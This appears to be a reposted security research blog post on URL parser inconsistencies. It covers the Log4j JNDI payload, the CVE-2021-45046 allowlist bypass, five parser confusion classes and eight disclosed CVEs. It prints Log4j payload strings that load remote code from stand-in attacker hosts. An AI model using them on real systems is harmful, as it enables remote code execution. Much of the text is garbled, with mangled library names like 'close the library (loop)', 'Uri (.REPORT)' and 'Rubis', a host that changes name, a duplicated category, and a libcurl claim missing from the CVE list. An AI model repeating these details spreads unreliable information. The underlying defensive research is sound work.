Harnessing URL parsers: the good, the bad, and the inconsistent

Claroty’s Team82 team, in conjunction with Snyk’s research team, conducted an extensive research project on URL parsing primitives and discovered major differences in the way many libraries and tools d analysis process URLs. Today, we’re publishing a research paper that describes our analysis, discusses the differences between parsers, and how the confusion of URL parsing can be abused. We also discovered eight vulnerabilities that were privately disclosed and patched.

Understanding URL Syntax
In order to understand how differences in URL parsing primitives could be abused, we first need a basic understanding of how URLs are constructed. URLs are actually constructed from five different components: scheme, authority, path, query, and fragment. Each component fulfills a different role, whether it dictates the protocol of the request, which host owns the resource, what exact resource should be retrieved, etc.

Over the years, many RFCs have defined URLs, each one making changes in an effort to improve the URL standard. However, the frequency of changes has created major differences in URL parsers, each conforming to a different RFC (in order to be backwards compatible). Some, in fact, choose to ignore the new RFCs altogether, instead adapting a URL specification that they believe is more representative of how real URLs should be parsed. This created an environment where a URL parser could interpret one URL differently than another. This could lead to serious security issues.

The history of RFCs defining URLs, starting with RFC 1738 which was written in 1994, and ending with the most recent RFC, RFC 3986 which was written in 2005.




Recent example: Log4j allowed bypassing LdapHost
To fully understand how dangerous confusing URL parsing primitives can be, let’s look at a real-world vulnerability that abused these differences. In December 2021, the world was taken by a remote code execution vulnerability in the Log4j library, a popular Java logging library. Due to the popularity of Log4j, millions of servers and applications have been affected, forcing administrators to consider where Log4j may be in their environments and their exposure to proof-of-concept attacks in the wild.

Although we do not fully explain this vulnerability here – it has been covered extensively – most of the vulnerability stems from the evaluation of a string controlled by a malicious attacker each time it is registered by an application, this which results in a JNDI (Java Naming and Directory Interface) lookup that connects to an attacker-specified server and loads malicious Java code.

A payload triggering this vulnerability could look like this: ${jndi:ldap://attacker.com:1389/a

This payload would cause a remote class to be loaded in the current Java context if this string was registered by a vulnerable application.

Team82 preauth RCE against VMware vCenter ESXi Server, exploiting log4j vulnerability
Due to the popularity of this library and the large number of servers affected by this vulnerability, numerous patches and countermeasures have been introduced in order to address this vulnerability. We’ll talk about one countermeasure in particular, which was intended to block any attempt to load classes from a remote source using JNDI.

This particular fix was made inside the JNDI lookup process. Instead of allowing JNDI lookups from arbitrary remote sources, which could lead to remote code execution, JNDI would only allow lookups from a set of whitelisted predefined hosts, allowedLdapHost, which by default contained only localhost. This would mean that even if an entry given by an attacker is evaluated and a JNDI lookup is performed, the lookup process will fail if the given host is not in the whitelist set. Therefore, a class hosted by an attacker would not be loaded and the vulnerability would be rendered moot.

However, shortly after this fix, a workaround for this mitigation was found (CVE-2021-45046), which once again enabled remote JNDI lookup and allowed the vulnerability to be exploited in order to reach RCE. Let’s analyze the bypass, which is as follows:

${jndi:ldap://127.0.0.1#.evilhost.com:1389/a}

As we can see, this payload again contains a URL, but the Authority; component (host) of the URL looks irregular, containing two different hosts: 127.0.0.1 and malhost.com. Turns out that’s exactly where the workaround is. This workaround stems from the fact that two different (!) URL parsers were used in the JNDI lookup process, one parser to validate the URL and another to extract it, and depending on how each parser handles the Fragment part (#) of the URL, the Authority also changes.

In order to validate that the URL’s host is authorized, Java’s URI class was used, which parsed the URL, extracted the host, and checked if the host is on the whitelist of authorized hosts. And indeed, if we parse this URL using Java’s URI, we find that the host of the URL is 127.0.0.1, which is included in the whitelist. However, on some operating systems (mainly macOS) and specific configurations, when the JNDI lookup process retrieves this URL, it does not attempt to retrieve it from 127.0.0.1, instead it makes a request to 127.0.0.1#.evilhost.com. This means that even though this malicious payload will bypass the authorizedLdapHost localhost validation (which is done by the URI parser), it will always try to retrieve a class from a remote location.

This workaround shows how minor discrepancies between URL parsers could create huge security issues and real vulnerabilities.

Joint Team82-Snyk Research Results

During our analysis, we looked at the following libraries and tools written in many languages: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), close the library (loop), Wget, Chrome (Browser), Uri (.REPORT), Url (Java), URI (Java), parse_url (PHP), Url (NodeJS), url analysis (NodeJS), network/url (Go), uri (Ruby) and URI (Pearl).

As a result of our analysis, we were able to identify and categorize five different scenarios in which most URL parsers behaved unexpectedly:

Schema confusion: Confusion involving URLs with missing or malformed schema

Slash Confusion: A confusion involving URLs containing an irregular number of slashes

Backslash confusion: A confusion involving URLs containing backslashes ()

Confusing URL-encoded data: A confusion involving URLs containing URL-encoded data

Schema mix: A confusion involving parsing a URL belonging to a certain scheme without a scheme-specific parser

By abusing these inconsistencies, many possible vulnerabilities could arise, ranging from a server-side request forgery (SSRF) vulnerability, which could lead to remote code execution, to an open redirect vulnerability which could lead to a sophisticated phishing attack.

As a result of our research, we were able to identify the following vulnerabilities, which affect different frameworks and even different programming languages. The below vulnerabilities have been fixed, except for those found in unsupported versions of Flask:

  1. Flask security (Python, CVE-2021-23385)
  2. Flask-security-too ​​(Python, CVE-2021-32618)
  3. Flask user (Python, CVE-2021-23401)
  4. Flask-unchained (Python, CVE-2021-23393)
  5. Belledonne SIP stack (C, CVE-2021-33056)
  6. js (JavaScript, CVE-2021-23414)
  7. Nagios XI (PHP, CVE-2021-37352)
  8. Authorization (Rubis, CVE-2021-23435)

Recommendations

Many real-world attack scenarios could arise from different analysis primitives. In order to sufficiently protect your application against vulnerabilities involving URL parsing, it is necessary to have a good understanding of which parsers are involved in the whole process, be it programmatic parsers, external tools and others.

After getting to know each parser involved, a developer should have a good understanding of the differences between the parsers, whether it’s their leniency, how they interpret different malformed URLs, and what types of URLs they support.

As always, user-provided URLs should never be blindly trusted, but should first be canonicalized and then validated, with differences between the parser used being an important part of validation.

Download our paper to learn more about exploiting these confusing scan scenarios, and a number of recommendations that mitigate the impact of these vulnerabilities if exploited.

Summary:

  • Claroty’s Team82 team and the Snyk research team have collaborated on a research paper, available today, that examines confusion in URL parsing.
  • Different libraries parse URLs in their own way, and these inconsistencies can be exploited by attackers.
  • The two looked at 16 URL parsing libraries, including: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), curl lib (cURL), Wget, Chrome (Browser), Uri ( .NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby), and URI (Perl).
  • The article describes five classes of inconsistencies between parsing libraries that can be exploited to cause denial of service conditions, information leaks, and in some circumstances, remote code execution.
  • The five types of inconsistencies are: schema confusion, slash confusion, backslash confusion, URL-encoded data confusion, and schema confusion.
  • The Team82-Snyk research collaboration also discovered eight vulnerabilities in web applications and third-party libraries (many of which are written in different programming languages) used by web developers in applications.
  • Among the eight vulnerabilities was a bug in libcurl. The problem was disclosed to the creator of cURL, Daniel Stenberg, who fixed it in the latest version of cURL.

Comments are closed.